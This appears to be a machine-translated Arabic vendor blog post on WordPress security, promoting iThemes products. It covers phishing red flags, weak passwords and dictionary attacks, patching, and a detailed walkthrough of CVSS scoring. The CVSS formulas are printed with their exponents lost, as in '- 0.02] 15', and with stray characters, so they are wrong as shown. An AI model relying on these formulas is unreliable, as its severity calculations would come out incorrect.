التصيد الاحتيالي هو أسلوب هجوم إلكتروني يستخدم البريد الإلكتروني ووسائل التواصل الاجتماعي والرسائل النصية والمكالمات الهاتفية لخداع الضحية للتخلي عن المعلومات الشخصية. سيستخدم المهاجم بعد ذلك المعلومات للوصول إلى الحسابات الشخصية أو ارتكاب عملية احتيال تتعلق بالهوية.

كيف تكتشف رسالة بريد إلكتروني مخادعة

كما تعلمنا سابقًا في هذا المنشور ، تتطلب بعض نقاط الضعف نوعًا من تفاعل المستخدم لاستغلالها. تتمثل إحدى الطرق التي يخدع بها الهاكر الناس في المشاركة في مساعيهم الشائنة عن طريق إرسال رسائل بريد إلكتروني للتصيد الاحتيالي.

إن تعلم كيفية اكتشاف رسالة بريد إلكتروني تصيدية يمكن أن يوفر عليك من اللعب عن غير قصد في خطط مجرمي الإنترنت.

4 نصائح لاكتشاف رسائل البريد الإلكتروني المخادعة :

1. انظر إلى عنوان البريد الإلكتروني من - إذا تلقيت بريدًا إلكترونيًا من شركة ، فيجب أن يتطابق جزء عنوان البريد الإلكتروني للمرسل بعد "@" مع اسم النشاط التجاري.
   
   إذا كان البريد الإلكتروني يمثل شركة أو كيانًا حكوميًا ولكنه يستخدم عنوان بريد إلكتروني عام مثل "gmail" ، فهذه علامة على رسالة بريد إلكتروني للتصيد الاحتيالي.
   
   ترقب الأخطاء الإملائية الدقيقة في اسم المجال. على سبيل المثال ، دعنا نلقي نظرة على عنوان البريد الإلكتروني هذا [البريد الإلكتروني المحمي] يمكننا أن نرى أن Netflix يحتوي على علامة "x" إضافية في النهاية. الخطأ الإملائي هو علامة واضحة على أن البريد الإلكتروني تم إرساله بواسطة محتال ويجب حذفه على الفور.
   
2. ابحث عن الأخطاء النحوية - يعد البريد الإلكتروني المليء بالأخطاء النحوية علامة على وجود بريد إلكتروني ضار. قد يتم تهجئة جميع الكلمات بشكل صحيح ، لكن الجمل تفتقد إلى الكلمات التي تجعل الجملة متماسكة. على سبيل المثال ، "تم اختراق حسابك. تحديث كلمة المرور لأمان الحساب ".
   
   الجميع يرتكب أخطاء ، وليس كل بريد إلكتروني به خطأ إملائي أو اثنين هو محاولة للاحتيال عليك. ومع ذلك ، فإن الأخطاء النحوية المتعددة تتطلب نظرة فاحصة قبل الرد.
   
3. المرفقات أو الروابط المشبوهة - من المفيد التوقف للحظة قبل التفاعل مع أي مرفقات أو روابط مضمنة في رسالة بريد إلكتروني.
   
   إذا لم تتعرف على مرسل رسالة البريد الإلكتروني ، فلا يجب عليك تنزيل أي مرفقات مضمنة في البريد الإلكتروني لأنها قد تحتوي على برامج ضارة وتصيب جهاز الكمبيوتر الخاص بك. إذا كان البريد الإلكتروني يدعي أنه من شركة ، فيمكنك Google معلومات الاتصال الخاصة بهم للتحقق من إرسال البريد الإلكتروني منهم قبل فتح أي مرفقات.
   
   إذا احتوت رسالة بريد إلكتروني على ارتباط ، فيمكنك تحريك مؤشر الماوس فوق الارتباط للتحقق من أن عنوان URL يوجهك إلى المكان الذي ينبغي أن يكون فيه.
   
4. احترس من الطلبات العاجلة - الحيلة الشائعة التي يستخدمها المحتالون هي خلق شعور بالإلحاح. قد يصنع البريد الإلكتروني الضار سيناريو يحتاج إلى إجراء فوري. كلما كان لديك وقت أطول للتفكير ، زادت فرصة التعرف على الطلب الذي يأتي من محتال.
   
   قد تتلقى بريدًا إلكترونيًا من "رئيسك" يطلب منك الدفع للبائع في أسرع وقت ممكن أو من البنك الذي تتعامل معه لإعلامك بأن حسابك قد تم اختراقه وأن الإجراء الفوري مطلوب.

2. أوراق اعتماد ضعيفة

يمكن للمستخدمين أن يكونوا أكبر ثغرة أمنية في WordPress.

في قائمة تم تجميعها بواسطة Splash Data ، كانت كلمة المرور الأكثر شيوعًا المضمنة في جميع عمليات تفريغ البيانات هي 123456. تفريغ البيانات عبارة عن قاعدة بيانات مخترقة مليئة بكلمات مرور المستخدم الملقاة في مكان ما على الإنترنت. هل يمكنك تخيل عدد الأشخاص على موقع الويب الخاص بك الذين يستخدمون كلمة مرور ضعيفة إذا كانت 123456 هي كلمة المرور الأكثر شيوعًا في عمليات تفريغ البيانات؟

على الرغم من أن 91٪ من الأشخاص يعرفون أن إعادة استخدام كلمات المرور ممارسة سيئة ، إلا أن 59٪ من الأشخاص لا يزالون يعيدون استخدام كلمات المرور الخاصة بهم في كل مكان! لا يزال العديد من هؤلاء الأشخاص يستخدمون كلمات مرور يعرفون أنها ظهرت في ملف تفريغ قاعدة البيانات.

يستخدم المتسللون شكلاً من أشكال القوة الغاشمة للهجوم يسمى هجوم القاموس. هجوم القاموس هو طريقة لاقتحام موقع WordPress باستخدام كلمات مرور شائعة الاستخدام ظهرت في مقالب قاعدة البيانات. "المجموعة رقم 1؟ تضمنت عملية اختراق البيانات التي تمت استضافتها على MEGA 1160253228 مجموعة فريدة من عناوين البريد الإلكتروني وكلمات المرور. هذا هو مليار مع أ ب. سيساعد هذا النوع من النقاط حقًا هجوم القاموس على تضييق كلمات مرور WordPress الأكثر استخدامًا.

تؤدي بيانات الاعتماد الضعيفة إلى تحويل تسجيل الدخول إلى WordPress الخاص بك إلى ثغرة أمنية يسهل على المتسللين استغلالها.

كيفية منع أوراق الاعتماد الضعيفة

أفضل طريقة لمنع بيانات الاعتماد الضعيفة هي إنشاء سياسة كلمة مرور قوية واستخدام المصادقة ذات العاملين.

تتيح ميزة متطلبات كلمة مرور iThemes Security Pro لأعضاء مجموعة مستخدمين إجبارهم على استخدام كلمة مرور قوية ، واختيار وقت انتهاء صلاحية كلمة المرور ، ورفض كلمات المرور المخترقة ، وفرض تغيير كلمات المرور على مستوى الموقع لجعل الجميع يمتثلون لسياسة كلمة المرور القوية الجديدة الخاصة بك.

المصادقة الثنائية هي عملية التحقق من هوية الشخص من خلال طلب طريقتين منفصلتين للتحقق. شاركت Google على مدونتها أن استخدام المصادقة الثنائية يمكن أن يوقف 100٪ من هجمات الروبوت الآلية.

توفر ميزة المصادقة الثنائية من iThemes Security Pro قدرًا كبيرًا من المرونة عند تنفيذ 2fa على موقع الويب الخاص بك. يمكنك تمكين عاملين لجميع المستخدمين أو بعضهم ، ويمكنك إجبار المستخدمين رفيعي المستوى على استخدام 2fa عند كل تسجيل دخول.

كيفية حماية موقع WordPress الخاص بك من نقاط الضعف في WordPress

دعنا نلقي نظرة على بعض الخطوات القابلة للتنفيذ التي يمكنك اتخاذها لحماية موقع الويب الخاص بك من نقاط ضعف WordPress.

1. حافظ على تحديث برنامج WordPress الخاص بك

يعد وجود مكون إضافي أو سمة ضعيفة يتوفر لها التصحيح ولكن لم يتم تطبيقها هو الجاني الأول لمواقع WordPress التي تم اختراقها. هذا يعني أنه يتم استغلال معظم الثغرات الأمنية بعد إصدار تصحيح للثغرة الأمنية.

كان من الممكن منع اختراق Equifax المبلغ عنه بشكل كبير إذا قاموا بتحديث برامجهم. بالنسبة لخرق Equifax ، لم يكن هناك ببساطة أي عذر.

يمكن أن يحميك شيء بسيط مثل تحديث برنامجك. لذلك لا تتجاهل تحديثات WordPress هذه - التحديثات هي أحد المكونات الأساسية لـ WordPress وجميع أمان الويب.

تجعل ميزة إدارة الإصدار iThemes Security Pro من تخصيص تحديثات WordPress وأتمتتها.

2. تتبع نقاط الضعف في WordPress

لن يحميك تحديث المكونات الإضافية والسمات الخاصة بك من كل ثغرة أمنية. تم التخلي عن بعض المكونات الإضافية والسمات من قبل المطورين الذين قاموا بإنشائها.

لسوء الحظ ، إذا كانت هناك ثغرة أمنية لمكوّن إضافي أو سمة تم التخلي عنها ، فلن يتم تصحيحها أبدًا. سيستهدف المتسللون مواقع الويب التي تستخدم هذه المكونات الإضافية التي تكون عرضة للخطر بشكل دائم.

إذا كان لديك مكون إضافي مهجور به ثغرة أمنية معروفة على موقع الويب الخاص بك ، فأنت تمنح المتسللين المخططات التي يحتاجونها للسيطرة على موقع الويب الخاص بك. لهذا السبب يجب عليك تتبع أحدث نقاط الضعف.

من الصعب تتبع كل ثغرة أمنية تم الكشف عنها في WordPress ومقارنة تلك القائمة بإصدارات المكونات الإضافية والسمات التي قمت بتثبيتها على موقع الويب الخاص بك. تتبع الثغرات الأمنية هو الفرق بين امتلاك موقع آمن مقابل موقع يمكن للقراصنة استغلاله بسهولة.

أخبار جيدة بالنسبة لك! نحن نتتبع ونشارك كل ثغرة أمنية تم الكشف عنها في تقارير الثغرات الأمنية في WordPress الخاصة بنا.

3. افحص موقع الويب الخاص بك بحثًا عن نقاط الضعف

تتمثل الطريقة الأسرع لحماية موقع الويب الخاص بك من عمليات استغلال القراصنة السهلة في استخدام عمليات الفحص الآلي للتحقق من مواقع الويب الخاصة بك بحثًا عن نقاط الضعف المعروفة.

يعد برنامج iThemes Security Pro Site Scanner طريقك لأتمتة حماية الثغرات الأمنية على جميع مواقع WordPress الخاصة بك. يقوم Site Scanner بفحص موقعك بحثًا عن نقاط ضعف معروفة وسيقوم تلقائيًا بتطبيق تصحيح إذا كان متاحًا.

يتحقق موقع iThemes Security Pro من 3 أنواع من الثغرات الأمنية.

1. ثغرات WordPress
2. ثغرات البرنامج المساعد
3. ثغرات الموضوع

تعمل ميزة iThemes Sync Pro Site Audit على تعزيز قوة Google Lighthouse لحماية موقع الويب الخاص بك. يفحص Site Audit ويضع علامة على الصفحات التي تتضمن مكتبات JavaScript أمامية بها ثغرات أمنية معروفة.

من الشائع للمطورين استخدام كود الطرف الثالث - مثل مكتبات JS - في المكونات الإضافية والسمات الخاصة بهم. لسوء الحظ ، إذا لم تتم صيانة المكتبات بشكل صحيح ، فيمكنها إنشاء نقاط ضعف يمكن للمهاجمين الاستفادة منها لاختراق موقع الويب الخاص بك. استخدام المكونات ذات الثغرات الأمنية المعروفة مدرج في قائمة OWASP Top 10.

لقد أنقذت مراجعة الموقع لحم الخنزير المقدد الخاص بي! لقد أنشأت جدول تدقيق لجعل Sync Pro تجري عمليات تدقيق آلية أسبوعية وإرسال تقارير التدقيق إليّ بالبريد الإلكتروني. أحتفظ بكل شيء محدثًا ، ولهذا السبب صدمت عندما رأيت في إحدى عمليات تدقيق موقع الويب الخاص بي أنني كنت أستخدم مكتبات JavaScript بها ثغرات أمنية معروفة.

أشار التقرير إلى إصدار قديم من jQuery في دليل WordPress الخاص بالموقع مليء بنقاط الضعف المعروفة! من حسن حظي أنني رأيت في Sync Pro Site Audit أنني كنت أستخدم مكتبات JavaScript بها ثغرات أمنية معروفة وتمكنت من حل المشكلة قبل اختراق موقع الويب الخاص بي.

كيفية قياس مخاطر ضعف WordPress

هناك عدة أنواع من نقاط الضعف في WordPress ، وكلها بدرجات متفاوتة من المخاطر. لحسن الحظ بالنسبة لنا ، فإن قاعدة البيانات الوطنية للثغرات الأمنية - وهي مشروع تابع للمعهد الوطني للعلوم والتكنولوجيا - لديها آلة حاسبة لنظام نقاط الضعف لتحديد مخاطر الضعف.

سيغطي هذا القسم من دليل الثغرات الأمنية في WordPress مقاييس نظام تسجيل نقاط الضعف ومستويات الخطورة. في حين أن هذا القسم أكثر تقنية إلى حد ما ، فقد يجد بعض المستخدمين أنه مفيد لتعميق فهمهم لكيفية تقييم ثغرات WordPress وشدتها.

مقاييس نظام نقاط الضعف الشائعة في WordPress

تستخدم معادلة نظام تسجيل نقاط الضعف ثلاث مجموعات مختلفة من الدرجات لتحديد درجة الخطورة الإجمالية.

1. المقاييس الأساسية

تمثل مجموعة المقاييس الأساسية خصائص الثغرة الأمنية الثابتة عبر بيئات المستخدم.

تنقسم المقاييس الأساسية إلى مجموعتين ، القابلية للاستغلال والتأثير.

1.1 مقاييس الاستغلال

تعتمد درجة قابلية الاستغلال على مدى صعوبة استغلال المهاجم للثغرة الأمنية. يتم احتساب النتيجة باستخدام 5 متغيرات مختلفة.

1.1.1. ناقل الهجوم (AV)

تعتمد درجة متجه الهجوم على الطريقة التي يتم بها استغلال الثغرة الأمنية. ستكون النتيجة أعلى كلما كان المهاجم بعيدًا عن استغلال الثغرة الأمنية.

الفكرة هي أن عدد المهاجمين المحتملين سيكون أكبر بكثير إذا كان من الممكن استغلال الثغرة الأمنية عبر شبكة مقارنة بالثغرة التي تتطلب الوصول المادي إلى جهاز استغلال.

فكلما زاد عدد المهاجمين المحتملين ، زادت مخاطر الاستغلال ، وبالتالي ، ستكون درجة ناقل الهجوم الممنوحة للثغرة الأمنية أعلى.

1.1.2. تعقيد الهجوم (AC)

تعتمد قيمة التعقيد على الشروط المطلوبة لاستغلال الثغرة الأمنية. قد تتطلب بعض الشروط جمع مزيد من المعلومات حول الهدف أو وجود إعدادات معينة لتكوين النظام أو استثناءات حسابية.

ستكون درجة تعقيد الهجوم أعلى كلما انخفض مستوى التعقيد المطلوب لاستغلال الثغرة الأمنية.

1.1.3. الامتيازات المطلوبة (العلاقات العامة)

يتم احتساب نقاط الامتيازات المطلوبة بناءً على الامتيازات التي يجب على المهاجم الحصول عليها قبل استغلال الثغرة الأمنية. سنغوص في هذا الأمر أكثر قليلاً في قسم المصادقة مقابل عدم المصادقة.

ستكون النتيجة أعلى إذا لم تكن هناك امتيازات مطلوبة.

1.1.4. تفاعل المستخدم (UI)

يتم تحديد درجة تفاعل المستخدم بناءً على ما إذا كانت الثغرة تتطلب تفاعل المستخدم لاستغلالها أم لا.

ستكون النتيجة أعلى عندما لا يكون هناك حاجة لتفاعل المستخدم للمهاجم لاستغلال الثغرة الأمنية.

1.1.5. نطاق

تعتمد درجة النطاق على ثغرة أمنية في أحد مكونات البرنامج للتأثير على الموارد خارج نطاق الأمان الخاص بها.

يشمل نطاق الأمان المكونات الأخرى التي توفر وظائف لهذا المكون فقط ، حتى لو كان لهذه المكونات الأخرى سلطة الأمان الخاصة بها.

تكون الدرجة أعلى عند حدوث تغيير في النطاق.

1.2 مقاييس التأثير

مقاييس التأثير تلتقط التأثيرات المباشرة لثغرة أمنية تم استغلالها بنجاح.

1.2.1. التأثير السري (ج)

تقيس درجة التأثير السرية هذه التأثير على سرية المعلومات التي تديرها البرامج المستغلة.

تكون النتيجة أعلى عندما تكون الخسارة للبرنامج المتأثر أعلى.

1.2.2. النزاهة (I)

تعتمد درجة النزاهة هذه على تأثير ثغرة أمنية تم استغلالها بنجاح.

تكون النتيجة أعلى عندما تكون نتيجة البرنامج المتأثر أكبر.

1.2.3. التوفر (أ)

تعتمد درجة الإتاحة على تأثير توافر البرامج المستغلة.

تكون الدرجة أعلى عندما تكون نتيجة المكون المتأثر أكبر.

حساب النتيجة الأساسية CVSS

النتيجة الأساسية هي دالة لمعادلات النتيجة الفرعية للتأثير وقابلية الاستغلال. حيث يتم تحديد الدرجة الأساسية على أنها ،

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. مقاييس النتيجة الزمنية

تقيس المقاييس الزمنية الحالة الحالية لتقنيات استغلال الثغرات ، ووجود أي تصحيحات أو حلول بديلة ، أو الثقة التي يتمتع بها المرء في وصف الثغرة الأمنية.

من المتوقع أن تتغير المقاييس الزمنية وستتغير بمرور الوقت.

2.1. نضج كود برمجيات إكسبلويت (هـ)

يعتمد نضج كود برمجيات إكسبلويت على احتمالية تعرض الثغرة للهجوم.

كلما كان من الأسهل استغلال الثغرة الأمنية ، زادت نقاط الضعف.

2.2. مستوى المعالجة (RL)

يعد مستوى معالجة الثغرات عاملاً مهمًا في تحديد الأولويات. قد تقدم الحلول البديلة أو الإصلاحات العاجلة علاجًا مؤقتًا حتى يتم إصدار تصحيح رسمي أو ترقية.

كلما كان الإصلاح أقل رسمية ودائمة ، زادت درجة الضعف.

2.3 تقرير الثقة (RC)

يقيس مقياس الثقة في التقرير مستوى الثقة بوجود ثغرة أمنية ومصداقية التفاصيل الفنية.

كلما تم التحقق من ثغرة أمنية من قبل البائع أو مصادر أخرى حسنة السمعة ، زادت الدرجة.

حساب نقاط CVSS الزمني

يتم تعريف الدرجة الزمنية على أنها ،

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. مقاييس النتائج البيئية

تسمح المقاييس البيئية للمحللين بتخصيص درجات CVSS بناءً على أهمية أصول تكنولوجيا المعلومات المتأثرة.

تعد مقاييس الاستغلال والتأثير البيئي مكافئًا معدلًا للمقاييس الأساسية ويتم تعيين قيم بناءً على موضع مكون البنية التحتية التنظيمية. راجع أقسام المقاييس الأساسية أعلاه لعرض قيم وأوصاف مقاييس قابلية الاستغلال والتأثير.

تحتوي المقاييس البيئية على مجموعة إضافية ، معدِّلات التأثير الفرعي.

3.1. مقاييس معدِّلات النتيجة الفرعية للتأثير

تقوم مقاييس معدِّلات التأثير الفرعي بتقييم متطلبات الأمان المحددة للسرية (CR) والنزاهة (IR) والتوافر (AR) ، مما يسمح بضبط النتيجة البيئية وفقًا لبيئة المستخدمين.

حساب نقاط CVSS البيئية

يتم تحديد النتيجة البيئية على أنها ،

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

مجموع نقاط وشدة CVSS

نظام نقاط الضعف المشترك العام أو درجة CVSS عبارة عن تمثيل للدرجات الأساسية والزمنية والبيئية.

يمكن استخدام النتيجة الإجمالية لـ CVSS لإعطائك فكرة عن مدى خطورة أو خطورة الثغرة.

مثال على تصنيف خطورة العالم الحقيقي CVSS

في تقرير الثغرات الأمنية لشهر ديسمبر 2020 ، أبلغنا عن وجود ثغرة أمنية في المكون الإضافي Easy WP SMTP. سمحت ثغرة يوم الصفر (سنغطي ثغرات يوم الصفر في القسم التالي) للمهاجم بالتحكم في حساب المسؤول وكان يتم استغلاله في البرية.

بإلقاء نظرة على إدخال قاعدة البيانات الوطنية للثغرات الأمنية ، يمكننا العثور على تصنيف خطورة ثغرة WP SMTP.

دعنا نفصل شيئين من لقطة شاشة WP SMTP NVDB أعلاه.

النتيجة الأساسية: الدرجة الأساسية 7.5 ، مما يخبرنا أن تصنيف شدة الثغرة الأمنية مرتفع.

المتجه : يخبرنا المتجه أن النتيجة تستند إلى معادلات الضعف CVSS 3.1 والمقاييس المستخدمة لحساب النتيجة.

هنا جزء المقاييس من المتجه.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

الآن دعنا نستخدم قيم وأوصاف المقياس الأساسي من سابقًا في هذا المنشور لفهم القيم المترية الثمانية للمتجه.

1. AV: N - هذا يعني أن ناقل الهجوم (AV) للثغرة الأمنية هو الشبكة (N). بمعنى آخر ، يحتاج المهاجم فقط إلى الوصول إلى الشبكة لاستغلال الثغرة الأمنية.
2. AC: L - تعقيد الهجوم (AC) للثغرة منخفض (L). بمعنى آخر ، يمكن لأي طفل نصي استغلال الثغرة الأمنية.
3. PR: N - الامتيازات المطلوبة (PR) اللازمة لاستغلال الثغرة الأمنية هي لا شيء (N). لذلك ، لا تتطلب الثغرة الأمنية استغلالها من قِبل مستخدم مُصادق. (سنغطي الفرق بين الثغرات الأمنية المصدق عليها وغير المصادق عليها لاحقًا في هذا المنشور.)
4. UI: N - إن تفاعل المستخدم (UI) المطلوب لاستغلال هذه الثغرة الأمنية هو بلا (N). لذلك ، يمتلك المهاجم الوسائل لاستغلال الثغرة الأمنية بنفسه.
5. S: U - وهذا يعني أن نطاق (S) الثغرة الأمنية لم يتغير (U). في حالة هذه الثغرة الأمنية ، يكون المكون الضعيف والمكون المتأثر متماثلين.
6. C: H - تأثير السرية (C) للضعف مرتفع (H). عندما يتم استغلال هذه الثغرة الأمنية ، فإنها تؤدي إلى فقدان السرية التام.
7. I: N - إن تأثير النزاهة (I) لهذه الثغرة الأمنية لا يوجد (N). عندما يتم استغلال الثغرة الأمنية ، لا يوجد فقدان لسلامة أو مصداقية المعلومات المعرضة للخطر.
8. ج: ن - هذا يعني أن تأثير التوفر (أ) لا يوجد (س). عندما يتم استغلال الثغرة الأمنية ، لن يكون هناك أي تأثير على توفر موقع الويب الخاص بك.

يمكن أن تساعدنا نتيجة CVSS في تحديد شدة ونطاق أي ثغرة أمنية معينة. في القسمين التاليين ، سنغطي بعض مصطلحات الثغرات الأمنية المهمة التي غالبًا ما يتم تضمينها في عمليات الكشف عن الثغرات الأمنية.

شرح نقاط الضعف في ووردبريس عبر الويب

تحقق من ندوة الويب الخاصة بنا التي تغطي نفس الموضوع.

الخلاصة: شرح نقاط الضعف في ووردبريس

على الرغم من أن نقاط الضعف في WordPress مخيفة ، إلا أن الخبر السار هو أن معظم نقاط الضعف في WordPress يتم اكتشافها وتصحيحها قبل أن تتاح الفرصة للأشرار لاستغلالها.

يمكنك المساعدة في حماية موقع الويب الخاص بك من الثغرات الأمنية عن طريق الحفاظ على WordPress الأساسي والمكون الإضافي والسمات الخاصة بك محدثة هي أفضل طريقة لضمان تلقيك أحدث تصحيحات الأمان.

مايكل مور

كل أسبوع ، يضع مايكل تقرير WordPress Vulnerability Report معًا للمساعدة في الحفاظ على أمان مواقعك. بصفته مدير المنتجات في iThemes ، فهو يساعدنا في مواصلة تحسين مجموعة منتجات iThemes. إنه الطالب الذي يذاكر كثيرا عملاقًا ويحب التعرف على كل ما يتعلق بالتكنولوجيا ، القديم والجديد. يمكنك أن تجد مايكل يتسكع مع زوجته وابنته ، يقرأ أو يستمع إلى الموسيقى عندما لا يعمل.